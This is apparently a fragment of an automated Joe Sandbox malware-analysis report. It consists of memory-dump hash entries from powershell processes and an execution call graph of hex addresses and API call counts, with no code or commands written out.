• Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
Similarity
• API ID:
• String ID: iS_L
• API String ID: 0-1272560476
                                                                                                                                                                      • Opcode ID: 412c3993536af2642ec200fd9638529684a2d7f695b908ff73c8603696b74825
                                                                                                                                                                      • Instruction ID: 8d595f38a0c9682835559624812561289e32e43aeb79ced5eebb2a7790af4277
                                                                                                                                                                      • Opcode Fuzzy Hash: 412c3993536af2642ec200fd9638529684a2d7f695b908ff73c8603696b74825
                                                                                                                                                                      • Instruction Fuzzy Hash: 5741043171CA454FD74CEA1CC495A71B7E0EF9A318B1401BEE48AC72A6EA26FC43C741
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9ec520116811995fc1fc60c5b4860db762079ea182254b0404bc5906a83beb5f
                                                                                                                                                                      • Instruction ID: 2a8420450dbe221184276448b2f329a278baac788bfd46e5ac090dcb9382b874
                                                                                                                                                                      • Opcode Fuzzy Hash: 9ec520116811995fc1fc60c5b4860db762079ea182254b0404bc5906a83beb5f
                                                                                                                                                                      • Instruction Fuzzy Hash: 0C424A26F0C6568FEB58EB9CE4B15E97BA0EFD4369B0441B7D04DCB197DE28A84583C0
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: acfa8d427b64b7ba136255abf02c85b57f6a7bc109387722c38843a42006025c
                                                                                                                                                                      • Instruction ID: b1b75715e5162505d3126d59197fee6daef89e9a3c02230417a32e98ebec3c86
                                                                                                                                                                      • Opcode Fuzzy Hash: acfa8d427b64b7ba136255abf02c85b57f6a7bc109387722c38843a42006025c
                                                                                                                                                                      • Instruction Fuzzy Hash: E822F531A18A498FDB98DF5CC4A5AA97BE1FF99314F1441BDD04AC7296DA34EC42CB80
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1779597388.00007FFD9AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ac60000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 40e308152216f5d67698af665516409827d284024f8a16bb59eacf33c22bafdd
                                                                                                                                                                      • Instruction ID: f48bc321e76c5598895423239ed91bafad2f254d7b20fcf678754cdc08be8bcc
                                                                                                                                                                      • Opcode Fuzzy Hash: 40e308152216f5d67698af665516409827d284024f8a16bb59eacf33c22bafdd
                                                                                                                                                                      • Instruction Fuzzy Hash: DEC10627B0DA8A0FEB6DEBA898655B97BD0EF55314B0801FEE45DCB1D3DA18A8058341
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 22f8bb23b96d2e0ef40f25fed4ad2fef941e9dfba73e3c9ba41ad1422067c7bc
                                                                                                                                                                      • Instruction ID: 196fa1fa42016a08a978433317768a7752cf6a766aa763ba56a8ee5254cf13ff
                                                                                                                                                                      • Opcode Fuzzy Hash: 22f8bb23b96d2e0ef40f25fed4ad2fef941e9dfba73e3c9ba41ad1422067c7bc
                                                                                                                                                                      • Instruction Fuzzy Hash: 5DB17970A1CB498FE759DF1CC4A5AB5BBE0FF95314F1041BED08AC3296DA25E842CB41
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1779597388.00007FFD9AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ac60000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 9a8b8d5ac0e30f317da697edbb9eea6b36e6c6cc00633bfb20143866d0a283e6
                                                                                                                                                                      • Instruction ID: b284899140a8fcdaa510f44d50bcd204cc646ffd449eaa07436741dd3b9a25e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 9a8b8d5ac0e30f317da697edbb9eea6b36e6c6cc00633bfb20143866d0a283e6
                                                                                                                                                                      • Instruction Fuzzy Hash: 46A12527B0DA8B1FE7AED66C59255B93BD1EF86320B1901FAD05DCB1D7DE18AC028341
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1779597388.00007FFD9AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ac60000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6141bd3108ad8b86f6be87ae664d94e9c935e83b033bcd0d1811afbeda44ef4c
                                                                                                                                                                      • Instruction ID: 8295dc51a9fe306afa62e4af7498debcb7bac5c5639041f5d5237d1a693b9767
                                                                                                                                                                      • Opcode Fuzzy Hash: 6141bd3108ad8b86f6be87ae664d94e9c935e83b033bcd0d1811afbeda44ef4c
                                                                                                                                                                      • Instruction Fuzzy Hash: E0913A37F0DA8A5FE7AAD76859255B87BD1EF86220B0901FBD05DCB1D7DE18AC028341
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1042080ab48e12130825a5a49f83035fd6c5ee215352c03276c38f5c71b23328
                                                                                                                                                                      • Instruction ID: 7d640e071f9c6b791f7b3f01addf8911c89a1deeddd7fa82c1241f49c28c82c4
                                                                                                                                                                      • Opcode Fuzzy Hash: 1042080ab48e12130825a5a49f83035fd6c5ee215352c03276c38f5c71b23328
                                                                                                                                                                      • Instruction Fuzzy Hash: 6E410871A0CB884FDB5C9B5C9C566A97BE0FBA9310F00426FE44DC3252DA71A815CBC2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1769996934.00007FFD9AA7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AA7D000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9aa7d000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6dc0568b459b2f935d425157d4e8d2f15820524cd33959188f159ab3d9bec8e0
                                                                                                                                                                      • Instruction ID: 705f903313e65c3d26135fb76c749b37ec7605ad95b49663da72b1d235fdea50
                                                                                                                                                                      • Opcode Fuzzy Hash: 6dc0568b459b2f935d425157d4e8d2f15820524cd33959188f159ab3d9bec8e0
                                                                                                                                                                      • Instruction Fuzzy Hash: 1B41257190DBC44FE76A8B3898559533FF0EF53328B1905EFD088CB1A3D625A84AC792
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: bff09d614203d1aa6829a0419656893ef17016905e86aba55be77180a1c2a742
                                                                                                                                                                      • Instruction ID: f90f91b4099438ce1ed96e1a7819284098b72984691c69092e36137909f733fb
                                                                                                                                                                      • Opcode Fuzzy Hash: bff09d614203d1aa6829a0419656893ef17016905e86aba55be77180a1c2a742
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A31F921E0D2938ED34ABB68A8B11D47B60EF11718B4842F7C45CCF4E7FE2919859399
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000009.00000002.1779597388.00007FFD9AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC60000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_9_2_7ffd9ac60000_powershell.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
• Opcode ID: 04e6e284e7d6144464617533b6728f464dff28b4d7d29c1328877776c66c5d15
• Instruction ID: eed0271642e5a0705b103a87d81a156e0104c3087ed7237b03032a98975f83db
• Opcode Fuzzy Hash: 04e6e284e7d6144464617533b6728f464dff28b4d7d29c1328877776c66c5d15
• Instruction Fuzzy Hash: 6221E12BB1EA876FE7BDDA5C566017877C1EF81210B6901FAD05ECF192CE18EC008341
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.1779597388.00007FFD9AC60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd9ac60000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e9b3054c4a650b2f6b6266b09f955e4020a0c3e5bbf0314ade3732d972b5f1e0
• Instruction ID: c19a2d1884af5e4fc722ca8466137b5ce23bb8cbb3f5712cb4bfbefdd96a0deb
• Opcode Fuzzy Hash: e9b3054c4a650b2f6b6266b09f955e4020a0c3e5bbf0314ade3732d972b5f1e0
• Instruction Fuzzy Hash: B311C137E0E9975FEBB9D6A896746B877D0EF41220B0900FAD05DCF096D919AC008341
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 86edf138029f4b6df4f319f08bbe8afee401992aae041ce2c8b479a8aa907b9b
• Instruction ID: bf9577e5e9b7b2072d356da8353058d7baefce6c332db351a369143a1c792179
• Opcode Fuzzy Hash: 86edf138029f4b6df4f319f08bbe8afee401992aae041ce2c8b479a8aa907b9b
• Instruction Fuzzy Hash: 8C01A73120CB0C4FD748EF0CE051AA5B3E0FB89324F10056DE58AC3695DA32E882CB41
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000009.00000002.1777334705.00007FFD9AB90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AB90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_2_7ffd9ab90000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f32b39857a1a14495dace93e3fd6f463e273a565427c328810a35c93c17d4367
• Instruction ID: ffa5f32b1a8824ee2f8738c3307a3f20c1187fae10b14295a169c9351f7a135a
• Opcode Fuzzy Hash: f32b39857a1a14495dace93e3fd6f463e273a565427c328810a35c93c17d4367
• Instruction Fuzzy Hash: 6EF0653271C6058FDB5CAA1CF4529B573D1EB99324B10017EF48BC3297E927F842CA85
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000038.00000002.1900890537.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_7ffd9ac90000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d09165172239c86fcf09f50e2ffd2f94b42fc495788a1711cd9a4b08c3f48a0b
• Instruction ID: 67992de08b6f200b8fdeb7ff391e4f7fe2d9d6edfe5f094f0743efddab76f731
• Opcode Fuzzy Hash: d09165172239c86fcf09f50e2ffd2f94b42fc495788a1711cd9a4b08c3f48a0b
• Instruction Fuzzy Hash: AE323727B0DB894FE7AA976858615B97BE1DF86210B0900FBD09DCB1DBED18AC06C351
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000038.00000002.1900208973.00007FFD9ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ABC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_7ffd9abc0000_powershell.jbxd
Similarity
• API ID:
• String ID: >Y_H$K_^
• API String ID: 0-1868155288
• Opcode ID: 1ab20aed08a5c90fe6c594d36eacff7d9071a8439948f86b66d78e1639e8ec25
• Instruction ID: c55020ca9f5d45da333887441256480cebb178fb29dad1a52e6d936b3b719e2d
• Opcode Fuzzy Hash: 1ab20aed08a5c90fe6c594d36eacff7d9071a8439948f86b66d78e1639e8ec25
• Instruction Fuzzy Hash: 80220732B0CA894FDB59EB5CC4B1EE97BF1FFA5314F1501BAD049C7296DA24A842C781
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000038.00000002.1900208973.00007FFD9ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ABC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_7ffd9abc0000_powershell.jbxd
Similarity
• API ID:
• String ID: K_^
• API String ID: 0-3865075263
• Opcode ID: 9c83778fe105ae36a11756507933cdfebef847ba4e468f3c17b14881f2d30c38
• Instruction ID: 3789ff3b056611178784650ceaf2905eeeb3e211a623f2a5bed202b3786d593b
• Opcode Fuzzy Hash: 9c83778fe105ae36a11756507933cdfebef847ba4e468f3c17b14881f2d30c38
• Instruction Fuzzy Hash: 9202E732B0C94A4FEB54FB9CE4A5AE97BB1FF94314F0543B6D049C7197DA24A846C780
Uniqueness

Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000038.00000002.1900208973.00007FFD9ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ABC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_7ffd9abc0000_powershell.jbxd
Similarity
• API ID:
• String ID: ^
• API String ID: 0-1590793086
• Opcode ID: c852722e836a3775dab5ea61b56726488a2b786aec63be5fedd22cef6bab5fc9
• Instruction ID: a362699eee3ae8a28f5e4aa00568c5651568c15a4d1989d96b65c469d570bdc8
• Opcode Fuzzy Hash: c852722e836a3775dab5ea61b56726488a2b786aec63be5fedd22cef6bab5fc9
• Instruction Fuzzy Hash: 46E13A33F0E6864FE719ABAC98655E97FB0EF86314F0942FBD099871A3DD256806C341
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000038.00000002.1900208973.00007FFD9ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ABC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_7ffd9abc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7609fe423f2b6aa624d411cc03a129f47c5f99c679c221a254244d5623439cb1
• Instruction ID: 921dd108e00ca5204c011b89dbf20a67241e557bf3a665151f27cac95ed11038
• Opcode Fuzzy Hash: 7609fe423f2b6aa624d411cc03a129f47c5f99c679c221a254244d5623439cb1
• Instruction Fuzzy Hash: 4B41153271CA494FDB58EA5CD8B1DA577E0FFA9315B1001BED48AC7293DA25F802C781
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000038.00000002.1900890537.00007FFD9AC90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9AC90000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_7ffd9ac90000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a6d21ebc0edb8344fe88a1de58477cacdad34763e9df4418e7edb2a5c0697a40
• Instruction ID: 2f775a2727c411873ae3e4777ab0d7bbb06f219d1384c7565f9999f461fbd2a2
• Opcode Fuzzy Hash: a6d21ebc0edb8344fe88a1de58477cacdad34763e9df4418e7edb2a5c0697a40
• Instruction Fuzzy Hash: A421E633F0C9594EEBB9A69C68256F873D0EB94721F1801BBD11DD71DADE19A80183C1
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000038.00000002.1900208973.00007FFD9ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ABC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_7ffd9abc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
• Instruction ID: db7ffd31aebc8eecbc859f38f24e4b6010198c59ba42f1065b306a273003bfdc
• Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
• Instruction Fuzzy Hash: 5001A73120CB0C4FD748EF0CE051AA5B3E0FB89324F10056EE58AC3695D636E881CB41
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000038.00000002.1900208973.00007FFD9ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ABC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_7ffd9abc0000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b7f0cf55b307302c8981f290f011968a12f7bc13b3e615fec0f166fae733af0a
• Instruction ID: 95fcacc0c2254ce942afc9cacb1a90f517ae356263b8fcf763ef5e2f68dcca92
• Opcode Fuzzy Hash: b7f0cf55b307302c8981f290f011968a12f7bc13b3e615fec0f166fae733af0a
• Instruction Fuzzy Hash: 7AF06C3170C90D4BA70C655CB8565F977C1DB99361B10427FF44AC769BDC16AC8346C5
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000038.00000002.1900208973.00007FFD9ABC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9ABC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_56_2_7ffd9abc0000_powershell.jbxd
Similarity
• API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: f7fea6efe1b7f71eed00bc4e84a25f42d81c574367745f71c8f9171b445c2f3d
                                                                                                                                                                      • Instruction ID: 5118367f42a819bef75dbe2d50b96aa5e1f766cec82bef5474e188c0a5567825
                                                                                                                                                                      • Opcode Fuzzy Hash: f7fea6efe1b7f71eed00bc4e84a25f42d81c574367745f71c8f9171b445c2f3d
                                                                                                                                                                      • Instruction Fuzzy Hash: 30F0A73271C6044FDB4CAA0CF452DB5B3D0E799324B10017EE48BC2296E927E842C685
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:8.2%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                      Signature Coverage:0.5%
                                                                                                                                                                      Total number of Nodes:1142
                                                                                                                                                                      Total number of Limit Nodes:29
API calls 39117->39118 39125 7ff7d79c2d21 39117->39125 39118->39125 39119 7ff7d79c2d86 39127 7ff7d7a049f4 48 API calls 39119->39127 39159 7ff7d79c2dd0 39119->39159 39120 7ff7d7a049f4 48 API calls 39179 7ff7d79c2005 39120->39179 39121 7ff7d79e6688 48 API calls 39121->39180 39122 7ff7d79d8444 54 API calls 39122->39179 39123 7ff7d79c5e70 169 API calls 39123->39179 39124 7ff7d79c80e4 192 API calls 39124->39159 39125->39119 39128 7ff7d7a049f4 48 API calls 39125->39128 39126 7ff7d79ca504 208 API calls 39126->39159 39130 7ff7d79c2d9e 39127->39130 39132 7ff7d79c2d6c 39128->39132 39129 7ff7d79c5928 237 API calls 39129->39179 39134 7ff7d79d8444 54 API calls 39130->39134 39131 7ff7d79e7c7c 127 API calls 39131->39159 39136 7ff7d7a049f4 48 API calls 39132->39136 39133 7ff7d79ca410 159 API calls 39133->39180 39135 7ff7d79c2da6 39134->39135 39144 7ff7d79e1c24 12 API calls 39135->39144 39140 7ff7d79c2d79 39136->39140 39137 7ff7d79de21c 63 API calls 39137->39179 39138 7ff7d79c1168 8 API calls 39138->39159 39139 7ff7d79cb540 147 API calls 39139->39180 39142 7ff7d79d8444 54 API calls 39140->39142 39141 7ff7d79ce6c8 157 API calls 39141->39180 39142->39119 39143 7ff7d79e65b4 48 API calls 39143->39180 39144->39159 39145 7ff7d7a0ae50 71 API calls 39150 7ff7d79c2e39 39145->39150 39146 7ff7d79e4554 16 API calls 39146->39180 39147 7ff7d79e1998 138 API calls 39147->39180 39148 7ff7d79c33b4 64 API calls 39148->39159 39149 7ff7d79c5db4 46 API calls 39149->39180 39150->39145 39151 7ff7d79dca40 61 API calls 39150->39151 39150->39159 39151->39159 39152 7ff7d79c6188 231 API calls 39152->39159 39153 7ff7d79e1930 11 API calls 39153->39180 39154 7ff7d79c3f74 138 API calls 39154->39159 39155 7ff7d79cb540 147 API calls 39155->39179 39156 7ff7d79e7c7c 127 API calls 39156->39180 39157 7ff7d79fba9c 195 API calls 39157->39159 39158 7ff7d7a049f4 48 API calls 39158->39159 39159->39124 39159->39126 39159->39131 39159->39138 39159->39148 39159->39150 39159->39152 39159->39154 39159->39157 39159->39158 39161 
7ff7d79d8444 54 API calls 39159->39161 39160 7ff7d79c5004 49 API calls 39160->39180 39161->39159 39162 7ff7d79ca4d0 12 API calls 39162->39180 39163 7ff7d79c571c 12 API calls 39163->39180 39164 7ff7d79e1e80 15 API calls 39164->39180 39165 7ff7d79c1168 8 API calls 39165->39180 39166 7ff7d7a0d48c 58 API calls 39166->39180 39167 7ff7d79c5e70 169 API calls 39167->39180 39168 7ff7d7a0c0a8 10 API calls 39168->39180 39169 7ff7d79d9be0 14 API calls 39169->39180 39170 7ff7d79e6378 RtlPcToFileHeader RaiseException EnterCriticalSection LeaveCriticalSection 39170->39180 39171 7ff7d79f97f0 GetStdHandle ReadFile GetLastError GetLastError GetFileType 39171->39180 39172 7ff7d79dcbd0 75 API calls 39172->39180 39173 7ff7d79e18ac 15 API calls 39173->39180 39174 7ff7d79e5c0c 237 API calls 39174->39180 39175 7ff7d79e5d40 237 API calls 39175->39180 39176 7ff7d7a0b6d0 73 API calls 39176->39179 39177 7ff7d79c6114 216 API calls 39177->39180 39178 7ff7d79e5708 237 API calls 39178->39180 39179->39120 39179->39122 39179->39123 39179->39129 39179->39137 39179->39155 39179->39176 39179->39180 39180->39116 39180->39121 39180->39133 39180->39139 39180->39141 39180->39143 39180->39146 39180->39147 39180->39149 39180->39153 39180->39156 39180->39160 39180->39162 39180->39163 39180->39164 39180->39165 39180->39166 39180->39167 39180->39168 39180->39169 39180->39170 39180->39171 39180->39172 39180->39173 39180->39174 39180->39175 39180->39177 39180->39178 39180->39179 39183 7ff7d79ea250 237 API calls 39180->39183 39184 7ff7d79d0d60 237 API calls 39180->39184 39185 7ff7d79eaae0 237 API calls 39180->39185 39181->39117 39182->39111 39183->39180 39184->39179 39185->39179 39187 7ff7d79f34f6 39186->39187 39188 7ff7d79c1893 39187->39188 39254 7ff7d7a0dac0 CompareStringW 39187->39254 39188->39057 39188->39067 39191 7ff7d79c546f setbuf 39190->39191 39193 7ff7d79c554a memcpy_s 39191->39193 39208 7ff7d79c5588 memcpy_s 39191->39208 39194 7ff7d7a0c0a8 10 API calls 39193->39194 39196 7ff7d79c5576 39194->39196 39195 
7ff7d79c5583 39263 7ff7d79c6eb8 39195->39263 39274 7ff7d79c681c 54 API calls 2 library calls 39196->39274 39200 7ff7d79c56e9 39270 7ff7d7a06f68 39200->39270 39202 7ff7d79c56f6 39203 7ff7d7a1a610 _UnwindNestedFrames 8 API calls 39202->39203 39204 7ff7d79c19df 39203->39204 39210 7ff7d79c72c4 39204->39210 39208->39195 39255 7ff7d7a07a24 39208->39255 39275 7ff7d79c3210 26 API calls 39208->39275 39276 7ff7d79d7088 10 API calls 39208->39276 39277 7ff7d79c571c 39208->39277 39285 7ff7d79d4380 14 API calls 39208->39285 39286 7ff7d79c681c 54 API calls 2 library calls 39208->39286 39211 7ff7d79c72eb 39210->39211 39383 7ff7d79d88dc 39211->39383 39213 7ff7d79c7302 39387 7ff7d79f915c 39213->39387 39215 7ff7d79c730f 39399 7ff7d79f7044 39215->39399 39218 7ff7d7a1a444 new 4 API calls 39219 7ff7d79c73e3 39218->39219 39220 7ff7d79c73f5 memcpy_s 39219->39220 39404 7ff7d79e894c 39219->39404 39222 7ff7d79d9be0 14 API calls 39220->39222 39223 7ff7d79c1a01 39222->39223 39223->39077 39225 7ff7d79c7539 39224->39225 39430 7ff7d79f922c 39225->39430 39229 7ff7d79d6d45 39228->39229 39230 7ff7d79d6cbc 39228->39230 39231 7ff7d79d6d83 39229->39231 39235 7ff7d79d6d69 39229->39235 39466 7ff7d79f9f78 8 API calls 2 library calls 39229->39466 39232 7ff7d79d6cd9 39230->39232 39461 7ff7d79f9f78 8 API calls 2 library calls 39230->39461 39231->39088 39234 7ff7d79d6cf3 39232->39234 39462 7ff7d79f9f78 8 API calls 2 library calls 39232->39462 39241 7ff7d79d6d0d 39234->39241 39463 7ff7d79f9f78 8 API calls 2 library calls 39234->39463 39235->39231 39467 7ff7d79f9f78 8 API calls 2 library calls 39235->39467 39240 7ff7d79d6d2b 39240->39231 39465 7ff7d79f9f78 8 API calls 2 library calls 39240->39465 39241->39240 39464 7ff7d79f9f78 8 API calls 2 library calls 39241->39464 39245 7ff7d79c7162 39244->39245 39246 7ff7d79c7167 39244->39246 39468 7ff7d79c6c64 130 API calls _UnwindNestedFrames 39245->39468 39248->39065 39249->39058 39250->39060 39251->39068 39252->39071 39253->39069 39254->39188 39256 7ff7d7a07a4f 
